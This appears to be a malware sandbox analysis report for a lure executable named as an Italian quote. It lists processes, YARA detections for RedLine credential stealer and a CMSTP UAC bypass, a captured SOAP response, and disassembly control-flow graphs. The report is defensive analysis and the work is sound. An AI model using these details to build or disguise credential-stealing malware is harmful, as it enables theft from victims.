                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:09:02:17
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Users\user\Desktop\Preventivo#09678.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\Desktop\Preventivo#09678.exe"
                                                                                      Imagebase:0x213c9630000
                                                                                      File size:1'583'745 bytes
                                                                                      MD5 hash:761710E429B4487833E5F9695DA7A981
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1518059605.00000213CB9A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1530009527.00000213DBEF4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:09:02:24
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                                      Imagebase:0xd90000
                                                                                      File size:47'584 bytes
                                                                                      MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.1431123502.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.1432476685.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:09:02:24
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff75da10000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:09:02:25
                                                                                      Start date:13/11/2024
                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 5092 -s 1152
                                                                                      Imagebase:0x7ff6dc5e0000
                                                                                      File size:570'736 bytes
                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.9%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:3
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 15570 7ffaac633f36 15571 7ffaac633f61 VirtualProtect 15570->15571 15573 7ffaac63408b 15571->15573
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1538050731.00007FFAAC710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC710000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac710000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 3$$3$$3$$3$
                                                                                        • API String ID: 0-782484511
                                                                                        • Opcode ID: c09126e17c00efe4f2b9d708164e0e2e1f23f981c974dd1f26303185e2367099
                                                                                        • Instruction ID: 27f0708cc02fa380da63f9fc60d2db3c81d9214df3e9a2411f8ebb5499e9e68f
                                                                                        • Opcode Fuzzy Hash: c09126e17c00efe4f2b9d708164e0e2e1f23f981c974dd1f26303185e2367099
                                                                                        • Instruction Fuzzy Hash: B2F2B37280E7C58FE756DB2888555A47FF0EF57300F1945FAD08DCB1A7EA28A80AC781
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: K
                                                                                        • API String ID: 0-856455061
                                                                                        • Opcode ID: 00bb489c3b8ce8140d46e591206a9aab1ac7d878279e3f3ca96e5260f04d1824
                                                                                        • Instruction ID: 085d98abcac5d011c9dbe15946e370d174a62530cfad923da309f0ceeef9f7c3
                                                                                        • Opcode Fuzzy Hash: 00bb489c3b8ce8140d46e591206a9aab1ac7d878279e3f3ca96e5260f04d1824
                                                                                        • Instruction Fuzzy Hash: 1BC2F475A0DA49CFEB99DB18C595AB877E1FF5A300F1450BAD04EC7292EE24EC45CB80

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 667 7ffaac631700-7ffaac635d21 call 7ffaac6357d0 674 7ffaac635d44-7ffaac635d53 667->674 675 7ffaac635d55-7ffaac635d6f call 7ffaac6357d0 call 7ffaac635820 674->675 676 7ffaac635d23-7ffaac635d39 call 7ffaac6357d0 call 7ffaac635820 674->676 676->674 685 7ffaac635d70-7ffaac635dc0 676->685 688 7ffaac635dcc-7ffaac635e03 685->688 689 7ffaac635dc2-7ffaac635dc7 call 7ffaac6343d8 685->689 692 7ffaac635fff-7ffaac636069 688->692 693 7ffaac635e09-7ffaac635e14 688->693 689->688 725 7ffaac63606b-7ffaac636071 692->725 726 7ffaac636086-7ffaac6360b0 692->726 694 7ffaac635e88-7ffaac635e8d 693->694 695 7ffaac635e16-7ffaac635e24 693->695 696 7ffaac635f00-7ffaac635f0a 694->696 697 7ffaac635e8f-7ffaac635e9b 694->697 695->692 699 7ffaac635e2a-7ffaac635e39 695->699 702 7ffaac635f2c-7ffaac635f34 696->702 703 7ffaac635f0c-7ffaac635f19 call 7ffaac6343f8 696->703 697->692 700 7ffaac635ea1-7ffaac635eb4 697->700 704 7ffaac635e6d-7ffaac635e78 699->704 705 7ffaac635e3b-7ffaac635e6b 699->705 706 7ffaac635f37-7ffaac635f42 700->706 702->706 720 7ffaac635f1e-7ffaac635f2a 703->720 704->692 708 7ffaac635e7e-7ffaac635e86 704->708 705->704 712 7ffaac635eb9-7ffaac635ebc 705->712 706->692 709 7ffaac635f48-7ffaac635f58 706->709 708->694 708->695 709->692 713 7ffaac635f5e-7ffaac635f6b 709->713 714 7ffaac635ebe-7ffaac635ece 712->714 715 7ffaac635ed2-7ffaac635eda 712->715 713->692 718 7ffaac635f71-7ffaac635f91 713->718 714->715 715->692 719 7ffaac635ee0-7ffaac635eff 715->719 718->692 727 7ffaac635f93-7ffaac635fa2 718->727 720->702 728 7ffaac6360b1-7ffaac636105 725->728 729 7ffaac636073-7ffaac636084 725->729 731 7ffaac635fed-7ffaac635ffe 727->731 732 7ffaac635fa4-7ffaac635faf 727->732 739 7ffaac636119-7ffaac636151 728->739 740 7ffaac636107-7ffaac636117 728->740 729->725 729->726 732->731 738 7ffaac635fb1-7ffaac635fe8 call 7ffaac6343f8 732->738 738->731 746 7ffaac636153-7ffaac636159 739->746 747 7ffaac6361a8-7ffaac6361af 739->747 740->739 740->740 746->747 751 7ffaac63615b-7ffaac63615c 746->751 749 7ffaac6361b1-7ffaac6361b2 747->749 750 7ffaac6361f2-7ffaac63621b 747->750 752 7ffaac6361b5-7ffaac6361b8 749->752 753 7ffaac63615f-7ffaac636162 751->753 754 7ffaac63621c-7ffaac636224 752->754 755 7ffaac6361ba-7ffaac6361cb 752->755 753->754 757 7ffaac636168-7ffaac636175 753->757 766 7ffaac636226-7ffaac636231 754->766 760 7ffaac6361cd-7ffaac6361d3 755->760 761 7ffaac6361e9-7ffaac6361f0 755->761 758 7ffaac6361a1-7ffaac6361a6 757->758 759 7ffaac636177-7ffaac63619e 757->759 758->747 758->753 759->758 760->754 764 7ffaac6361d5-7ffaac6361e5 760->764 761->750 761->752 764->761 767 7ffaac63623b-7ffaac636248 766->767 768 7ffaac636233-7ffaac63623a 766->768 767->766 769 7ffaac636249-7ffaac6362c1 767->769 768->767
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d
                                                                                        • API String ID: 0-2564639436
                                                                                        • Opcode ID: 91872b6b2d8757ae3a21f7bcf8647aee7efeb2fbe1059ebca202f67b0f0015da
                                                                                        • Instruction ID: 97b927672d473c5a62b619e15fac72472ef32fcf2d1ca689cd0be8ba53d63b57
                                                                                        • Opcode Fuzzy Hash: 91872b6b2d8757ae3a21f7bcf8647aee7efeb2fbe1059ebca202f67b0f0015da
                                                                                        • Instruction Fuzzy Hash: DD22467091DA898FE74ADB28C4866B177E1FF56310B1492BAD44EC7297DE28E847C7C0

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: fish
                                                                                        • API String ID: 0-1064584243
                                                                                        • Opcode ID: 2e5100c1c84c8c8b77dd9e6238ba1213e3cbb7451a2a28e0e037a4a772d63843
                                                                                        • Instruction ID: 8a687c8a43f20e7a1abc261b33412ff3b5640a3d7d1054c9cefdfbfc6de5206c
                                                                                        • Opcode Fuzzy Hash: 2e5100c1c84c8c8b77dd9e6238ba1213e3cbb7451a2a28e0e037a4a772d63843
                                                                                        • Instruction Fuzzy Hash: 4FC13931A1DA8A8FEB5DEB28D4595B577E1FF96310B04917ED04FC3292DD24E80687C1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 858 7ffaac63cc61-7ffaac63cc9b 859 7ffaac63cd2c-7ffaac63cd3f 858->859 860 7ffaac63cca1-7ffaac63cce6 call 7ffaac63bd40 call 7ffaac638610 858->860 864 7ffaac63cd81-7ffaac63cd84 859->864 865 7ffaac63cd41-7ffaac63cd59 859->865 860->859 873 7ffaac63cce8-7ffaac63cd06 860->873 868 7ffaac63cd85-7ffaac63cda1 864->868 869 7ffaac63ce26-7ffaac63ce37 864->869 871 7ffaac63cd5b-7ffaac63cd7f 865->871 872 7ffaac63cda3-7ffaac63cdba call 7ffaac638610 call 7ffaac638d70 865->872 868->872 878 7ffaac63ce79-7ffaac63ce86 869->878 879 7ffaac63ce39-7ffaac63ce47 869->879 871->864 872->869 889 7ffaac63cdbc-7ffaac63cdce 872->889 873->859 876 7ffaac63cd08-7ffaac63cd2b 873->876 882 7ffaac63cf23-7ffaac63cf31 878->882 883 7ffaac63ce87-7ffaac63ce91 878->883 881 7ffaac63ce4a 879->881 887 7ffaac63ce4b-7ffaac63ce59 881->887 892 7ffaac63cf33-7ffaac63cf35 882->892 893 7ffaac63cf36-7ffaac63cf54 882->893 884 7ffaac63ce93-7ffaac63ce94 883->884 885 7ffaac63ce97-7ffaac63cea1 883->885 884->885 888 7ffaac63cea3-7ffaac63cec5 call 7ffaac63bd40 885->888 887->888 896 7ffaac63ce5b-7ffaac63ce5e 887->896 888->882 903 7ffaac63cec7-7ffaac63ced9 888->903 889->881 899 7ffaac63cdd0 889->899 892->893 897 7ffaac63cf55-7ffaac63cf59 893->897 900 7ffaac63ce62-7ffaac63ce78 896->900 901 7ffaac63cf5b-7ffaac63cf86 897->901 902 7ffaac63cfa3-7ffaac63cfe3 call 7ffaac63bd40 * 2 call 7ffaac638610 897->902 904 7ffaac63cdd2-7ffaac63cdda 899->904 905 7ffaac63ce16-7ffaac63ce25 899->905 900->878 906 7ffaac63d07c-7ffaac63d08f 901->906 907 7ffaac63cf8c-7ffaac63cfa0 901->907 902->906 935 7ffaac63cfe9-7ffaac63d00d 902->935 903->897 913 7ffaac63cedb 903->913 904->887 910 7ffaac63cddc-7ffaac63cde1 904->910 922 7ffaac63d0d1 906->922 923 7ffaac63d091-7ffaac63d0a6 906->923 907->902 910->900 911 7ffaac63cde3-7ffaac63ce04 call 7ffaac6389b0 910->911 911->869 925 7ffaac63ce06-7ffaac63ce14 911->925 916 7ffaac63cedd-7ffaac63cefb call 7ffaac6389b0 913->916 917 7ffaac63cf21-7ffaac63cf22 913->917 916->882 931 7ffaac63cefd-7ffaac63cf20 916->931 924 7ffaac63d0d2-7ffaac63d0d9 922->924 929 7ffaac63d0db-7ffaac63d0de 923->929 932 7ffaac63d0a8 923->932 924->929 925->905 933 7ffaac63d0e0-7ffaac63d0f0 929->933 934 7ffaac63d0f2-7ffaac63d0fe 929->934 931->917 936 7ffaac63d0ab-7ffaac63d0be 932->936 937 7ffaac63d10e-7ffaac63d117 933->937 934->937 938 7ffaac63d100-7ffaac63d10b 934->938 935->906 944 7ffaac63d00f-7ffaac63d01c 935->944 936->924 940 7ffaac63d0c0-7ffaac63d0c1 936->940 942 7ffaac63d119-7ffaac63d11b 937->942 943 7ffaac63d188-7ffaac63d195 937->943 938->937 941 7ffaac63d0c2-7ffaac63d0d0 940->941 941->937 945 7ffaac63d11d 942->945 946 7ffaac63d197-7ffaac63d1aa 942->946 943->946 947 7ffaac63d01e-7ffaac63d03a 944->947 948 7ffaac63d065-7ffaac63d06e 944->948 953 7ffaac63d11f-7ffaac63d137 call 7ffaac6389b0 945->953 954 7ffaac63d163-7ffaac63d187 945->954 949 7ffaac63d1b1-7ffaac63d1e3 call 7ffaac63bd40 call 7ffaac638610 946->949 950 7ffaac63d1ac call 7ffaac63bd40 946->950 947->936 955 7ffaac63d03c-7ffaac63d041 947->955 952 7ffaac63d070-7ffaac63d07b 948->952 957 7ffaac63d2e9-7ffaac63d31a 949->957 972 7ffaac63d1e9-7ffaac63d209 949->972 950->949 953->954 956 7ffaac63d18d-7ffaac63d1ac call 7ffaac63bd40 954->956 954->957 955->941 960 7ffaac63d043-7ffaac63d05b 955->960 956->949 974 7ffaac63d31c-7ffaac63d347 957->974 975 7ffaac63d364-7ffaac63d3a6 call 7ffaac63bd40 * 2 call 7ffaac638610 957->975 970 7ffaac63d063 960->970 970->952 976 7ffaac63d20b-7ffaac63d22b 972->976 977 7ffaac63d28a-7ffaac63d29b 972->977 978 7ffaac63d34d-7ffaac63d363 974->978 979 7ffaac63d4de-7ffaac63d533 974->979 975->979 1001 7ffaac63d3ac-7ffaac63d3ca 975->1001 981 7ffaac63d29c-7ffaac63d2a8 976->981 982 7ffaac63d22d-7ffaac63d232 976->982 977->981 978->975 999 7ffaac63d539-7ffaac63d58e call 7ffaac63bd40 * 2 call 7ffaac638610 979->999 1000 7ffaac63d606-7ffaac63d611 979->1000 984 7ffaac63d2af-7ffaac63d2b0 981->984 985 7ffaac63d2aa call 7ffaac63c710 981->985 986 7ffaac63d234-7ffaac63d266 call 7ffaac6389b0 982->986 987 7ffaac63d2b3-7ffaac63d2bf 982->987 984->987 985->984 986->957 998 7ffaac63d26c-7ffaac63d2aa call 7ffaac63c710 986->998 987->957 992 7ffaac63d2c1-7ffaac63d2e8 987->992 998->984 999->1000 1033 7ffaac63d590-7ffaac63d5bb 999->1033 1009 7ffaac63d613-7ffaac63d615 1000->1009 1010 7ffaac63d616-7ffaac63d65b 1000->1010 1001->979 1004 7ffaac63d3d0-7ffaac63d3ea 1001->1004 1007 7ffaac63d3ec-7ffaac63d3ef 1004->1007 1008 7ffaac63d443 1004->1008 1013 7ffaac63d3f1-7ffaac63d40a 1007->1013 1014 7ffaac63d470-7ffaac63d4b2 call 7ffaac63c710 1007->1014 1015 7ffaac63d445-7ffaac63d44a 1008->1015 1016 7ffaac63d4b4 1008->1016 1009->1010 1024 7ffaac63d661-7ffaac63d6a1 call 7ffaac63bd40 call 7ffaac638610 1010->1024 1025 7ffaac63d6e5-7ffaac63d6f7 1010->1025 1020 7ffaac63d40c-7ffaac63d423 1013->1020 1021 7ffaac63d425-7ffaac63d437 1013->1021 1014->1016 1022 7ffaac63d44c-7ffaac63d46b call 7ffaac6389b0 1015->1022 1023 7ffaac63d4cb-7ffaac63d4dd 1015->1023 1016->979 1019 7ffaac63d4b6-7ffaac63d4c9 1016->1019 1019->1023 1029 7ffaac63d43b-7ffaac63d441 1020->1029 1021->1029 1022->1014 1024->1025 1047 7ffaac63d6a3-7ffaac63d6e4 call 7ffaac6397f0 1024->1047 1040 7ffaac63d739-7ffaac63d7ae call 7ffaac638fd0 1025->1040 1041 7ffaac63d6f9-7ffaac63d737 1025->1041 1029->1008 1038 7ffaac63d5bd-7ffaac63d5cf 1033->1038 1039 7ffaac63d5fa-7ffaac63d605 1033->1039 1038->1000 1043 7ffaac63d5d1-7ffaac63d5f7 1038->1043 1057 7ffaac63d8a9-7ffaac63d8b3 1040->1057 1041->1040 1043->1039 1058 7ffaac63d7b3-7ffaac63d7be 1057->1058 1059 7ffaac63d8b9-7ffaac63d8bf 1057->1059 1060 7ffaac63d8c0-7ffaac63d987 1058->1060 1061 7ffaac63d7c4-7ffaac63d80d 1058->1061 1070 7ffaac63d82a-7ffaac63d82c 1061->1070 1071 7ffaac63d80f-7ffaac63d828 1061->1071 1072 7ffaac63d82f-7ffaac63d83c 1070->1072 1071->1072 1075 7ffaac63d8a1-7ffaac63d8a6 1072->1075 1076 7ffaac63d83e-7ffaac63d89c call 7ffaac63a4e0 1072->1076 1075->1057 1076->1075
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 074b30cea2d26cd4d0f2f2d20ded7b5130403e5ed10e73aa92eaa0a89451d719
                                                                                        • Instruction ID: 98722144b23458f426e7b5f2d775ca4a56497d6fe02ad348461b06a6afd298b2
                                                                                        • Opcode Fuzzy Hash: 074b30cea2d26cd4d0f2f2d20ded7b5130403e5ed10e73aa92eaa0a89451d719
                                                                                        • Instruction Fuzzy Hash: FEA2287051DB858FE30ADF28C4544A57BE1FF96301B1495BEE48ECB3A6DA34E84AC781
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f219fccc7f4745e9d97a269273e775b757106a6008a4b30d96972fbabf3c3849
                                                                                        • Instruction ID: d4c370c49ec5ceeef9de8591164d286e6bfb835d7d9dbe0b12c6942162971216
                                                                                        • Opcode Fuzzy Hash: f219fccc7f4745e9d97a269273e775b757106a6008a4b30d96972fbabf3c3849
                                                                                        • Instruction Fuzzy Hash: 6A72573160DB8A8FE35ADB28C5415B177E1FF96301B1495BED48EC7292EE24E84AC7C1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1540 7ffaac63f7e9-7ffaac63f81d 1543 7ffaac63f825-7ffaac63f85e 1540->1543 1545 7ffaac63f860-7ffaac63f865 1543->1545 1546 7ffaac63f8cf-7ffaac63f8e5 call 7ffaac63bd40 1543->1546 1547 7ffaac63f867-7ffaac63f881 call 7ffaac6389b0 1545->1547 1548 7ffaac63f8e6-7ffaac63f8fa 1545->1548 1559 7ffaac63f8ff-7ffaac63f90a 1546->1559 1560 7ffaac63f8e7-7ffaac63f8fa 1546->1560 1547->1546 1552 7ffaac63f998-7ffaac63f99a 1548->1552 1555 7ffaac63f99c-7ffaac63f9a1 1552->1555 1556 7ffaac63fa0b-7ffaac63fa10 1552->1556 1557 7ffaac63f9a3-7ffaac63f9bf 1555->1557 1558 7ffaac63fa22 1555->1558 1556->1558 1561 7ffaac63fa24-7ffaac63fa25 1558->1561 1562 7ffaac63fa28-7ffaac63fa76 call 7ffaac63bd40 * 2 call 7ffaac638610 1558->1562 1563 7ffaac63f90c-7ffaac63f91f 1559->1563 1564 7ffaac63f921-7ffaac63f92c 1559->1564 1560->1552 1561->1562 1579 7ffaac63fa7c-7ffaac63fa9a 1562->1579 1580 7ffaac63fbf9-7ffaac63fc53 1562->1580 1563->1552 1566 7ffaac63f92e-7ffaac63f940 1564->1566 1567 7ffaac63f942-7ffaac63f961 1564->1567 1566->1552 1567->1552 1572 7ffaac63f963-7ffaac63f994 1567->1572 1572->1552 1579->1580 1581 7ffaac63faa0-7ffaac63fabf 1579->1581 1598 7ffaac63fc59-7ffaac63fcb4 call 7ffaac63bd40 * 2 call 7ffaac638610 1580->1598 1599 7ffaac63fd86-7ffaac63fde3 1580->1599 1585 7ffaac63fac1-7ffaac63fae0 1581->1585 1586 7ffaac63fb40-7ffaac63fb4a 1581->1586 1590 7ffaac63fb51-7ffaac63fb66 1585->1590 1591 7ffaac63fae2-7ffaac63fae7 1585->1591 1587 7ffaac63fb4c-7ffaac63fb4f 1586->1587 1588 7ffaac63fb7e-7ffaac63fbcf call 7ffaac63c710 1586->1588 1587->1588 1588->1580 1601 7ffaac63fbd1-7ffaac63fbf8 1588->1601 1593 7ffaac63fb68-7ffaac63fb79 1590->1593 1591->1593 1595 7ffaac63fae9-7ffaac63fb38 call 7ffaac6389b0 1591->1595 1593->1588 1597 7ffaac63fb7b-7ffaac63fb7c 1593->1597 1595->1590 1606 7ffaac63fb3a-7ffaac63fb3f 1595->1606 1597->1588 1598->1599 1618 7ffaac63fcba-7ffaac63fd10 1598->1618 1610 7ffaac63fe9e-7ffaac63fea9 1599->1610 1611 7ffaac63fde9-7ffaac63fe3e call 7ffaac63bd40 * 2 call 7ffaac638610 1599->1611 1606->1586 1619 7ffaac63feab-7ffaac63fead 1610->1619 1620 7ffaac63feae-7ffaac63fef7 1610->1620 1611->1610 1631 7ffaac63fe40-7ffaac63fe64 1611->1631 1618->1599 1622 7ffaac63fd12-7ffaac63fd5d call 7ffaac63c710 1618->1622 1619->1620 1629 7ffaac63fefd-7ffaac63ff56 call 7ffaac63bd40 * 2 call 7ffaac638610 1620->1629 1630 7ffaac64008b-7ffaac6400ba 1620->1630 1622->1599 1632 7ffaac63fd5f-7ffaac63fd85 1622->1632 1629->1630 1650 7ffaac63ff5c-7ffaac63ff7a 1629->1650 1643 7ffaac6400bc-7ffaac6400e7 1630->1643 1644 7ffaac640104-7ffaac640143 call 7ffaac63bd40 * 2 call 7ffaac638610 1630->1644 1634 7ffaac63fe92-7ffaac63fe9d 1631->1634 1635 7ffaac63fe66-7ffaac63fe76 1631->1635 1635->1610 1638 7ffaac63fe78-7ffaac63fe8f 1635->1638 1638->1634 1646 7ffaac6400ed-7ffaac640103 1643->1646 1647 7ffaac640247-7ffaac640268 1643->1647 1644->1647 1667 7ffaac640149-7ffaac640164 1644->1667 1646->1644 1650->1630 1652 7ffaac63ff80-7ffaac63ff9a 1650->1652 1656 7ffaac63ff9c-7ffaac63ffba 1652->1656 1657 7ffaac63fff3-7ffaac63fff7 1652->1657 1664 7ffaac63ffbc-7ffaac63ffd1 1656->1664 1665 7ffaac63ffd3-7ffaac63ffe4 1656->1665 1661 7ffaac63fff9-7ffaac64005f call 7ffaac6389b0 call 7ffaac63c710 1657->1661 1662 7ffaac640078-7ffaac64008a 1657->1662 1672 7ffaac640061 1661->1672 1668 7ffaac63ffe8-7ffaac63fff0 1664->1668 1665->1668 1670 7ffaac6401bd-7ffaac6401c4 1667->1670 1671 7ffaac640166-7ffaac640169 1667->1671 1668->1672 1673 7ffaac63fff2 1668->1673 1670->1647 1677 7ffaac6401ca-7ffaac6401e7 1670->1677 1675 7ffaac64016b-7ffaac640189 1671->1675 1676 7ffaac6401ea-7ffaac6401f9 1671->1676 1672->1630 1679 7ffaac640063-7ffaac640076 1672->1679 1673->1657 1680 7ffaac64018b-7ffaac640190 1675->1680 1681 7ffaac6401fa-7ffaac64020e call 7ffaac63c710 1675->1681 1676->1681 1677->1676 1679->1662 1682 7ffaac640211-7ffaac64021d 1680->1682 1683 7ffaac640192-7ffaac6401b6 call 7ffaac6389b0 1680->1683 1681->1682 1682->1647 1685 7ffaac64021f-7ffaac640246 1682->1685 1683->1670
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1537256344.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffaac630000_Preventivo#09678.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: de4db487dfde70b1fba6150c2aa27d5deaa1c134d90f993631a1ea5f4d89901f
                                                                                        • Instruction ID: 622c50123d5d1664ba2394b17ae8ce73f6e2afbd857a93c48d929c2088ecae52
                                                                                        • Opcode Fuzzy Hash: de4db487dfde70b1fba6150c2aa27d5deaa1c134d90f993631a1ea5f4d89901f
                                                                                        • Instruction Fuzzy Hash: BA72183061DB858FE35ADB28C4914B5B7E2FFC6301B1495BEE48AC7296DE34E44AC781

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
